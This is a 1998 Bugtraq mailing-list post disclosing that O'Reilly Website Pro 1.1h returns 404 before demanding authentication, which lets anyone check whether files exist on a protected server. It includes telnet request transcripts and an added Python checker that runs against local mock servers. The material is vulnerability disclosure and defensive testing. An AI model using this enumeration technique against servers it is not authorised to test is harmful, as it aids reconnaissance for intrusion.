Bugtraq mailing list archives
Flaw in HTTP-Authentication in O'Reilly Website Pro
From: bk () arena cwnet com (BarKode)
Date: Fri, 24 Apr 1998 03:14:02 +0000
Greetings...

I went to download a file I'd stashed away on a machine at work running Website Pro 1.1h, with HTTP-Authentication required to access the site at all. I mistyped the name and to my astonishment got a 404 error. This only surprised me because I had just started the browser, and had not yet been prompted for a username and password (Authentication-basic style).

Problem: You can remotely check for existence of files and directory structures on a machine running Web Site Pro 1.1.

Observe:

Here we will try to access index.html, a file which exists on the protected host.

thunder:~$ telnet protected.host.com 80
Trying 1.2.3.4...
Connected to protected.host.com.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 401 Unauthorized
Date: Fri, 24 Apr 1998 09:33:46 GMT
Server: WebSitePro/1.1h
Accept-ranges: bytes
WWW-Authenticate: Basic realm="Web Server"
Content-length: 156

<HTML><HEAD><TITLE>Authorization Required</TITLE></HEAD>
<BODY><H1>Authorization Required</H1>
Authentication (Basic) failed or was missing.
</BODY></HTML>
Connection closed by foreign host.

******

Now we try to access a file that does *not* exist.

thunder:~$ telnet protected.host.com 80
Trying 1.2.3.4...
Connected to protected.host.com.
Escape character is '^]'.
GET /nothere.html HTTP/1.0

HTTP/1.0 404 Not Found
Date: Fri, 24 Apr 1998 09:35:42 GMT
Server: WebSitePro/1.1h
Accept-ranges: bytes
Content-type: text/html
Content-length: 207

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY><H1>404 Not Found</H1>
The requested URL was not found on this server:<P><CODE>/nothere.html<P>(C:/WebSite/htdocs/nothere.html)</CODE><P>
</BODY></HTML>
Connection closed by foreign host.

*****

No mention whatsoever of Authentication, the server spewed forth a 404 document, gleefully stating the file we want isn't there.

The same situation posed under Apache 1.2.5 returns a '401 Unauthorized' in either situation.

Contacted O'Reilly, awaiting response....

-Matt
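The check below is an added example, not part of the original post and not O'Reilly's or Apache's code: it tests whether an unauthenticated client gets different status codes for an existing and a missing path, the difference the two telnet sessions above show. It runs against two local handlers that model the reported ordering and the 401-in-either-case behaviour; LookupFirst, AuthFirst, DOCS and all function names are hypothetical.

```python
from http import client, server
import threading
import uuid

DOCS = {"/", "/index.html"}  # constructed document tree for the demo

class LookupFirst(server.BaseHTTPRequestHandler):
    """Hypothetical model of the reported behaviour: 404 is decided before 401."""
    auth_first = False
    def do_GET(self):
        authed = "Authorization" in self.headers  # presence only, not validated
        if self.auth_first and not authed:
            code = 401
        elif self.path not in DOCS:
            code = 404
        else:
            code = 200 if authed else 401
        self.send_response(code)
        if code == 401:
            self.send_header("WWW-Authenticate", 'Basic realm="Web Server"')
        self.end_headers()
    log_message = lambda self, *args: None  # keep the demo quiet

class AuthFirst(LookupFirst):
    """Corrected ordering: every unauthenticated request gets 401."""
    auth_first = True

def unauth_status(host, port, path):
    """Status code of a GET sent without any Authorization header."""
    conn = client.HTTPConnection(host, port, timeout=5)
    conn.request("GET", path)
    status = conn.getresponse().status
    conn.close()
    return status

def leaks_existence(host, port, known_path="/index.html"):
    """True if an unauthenticated client can tell a real path from a missing one."""
    missing = "/" + uuid.uuid4().hex + ".html"  # random name, assumed absent
    return unauth_status(host, port, known_path) != unauth_status(host, port, missing)

def check(handler):
    """Serve the handler on a loopback port and run the comparison against it."""
    with server.HTTPServer(("127.0.0.1", 0), handler) as srv:
        threading.Thread(target=srv.serve_forever, daemon=True).start()
        try:
            return leaks_existence("127.0.0.1", srv.server_port)
        finally:
            srv.shutdown()

if __name__ == "__main__":
    print("lookup-first:", check(LookupFirst), "| auth-first:", check(AuthFirst))
```

For a regression test on your own protected server, call leaks_existence with its host, port and one path you know exists.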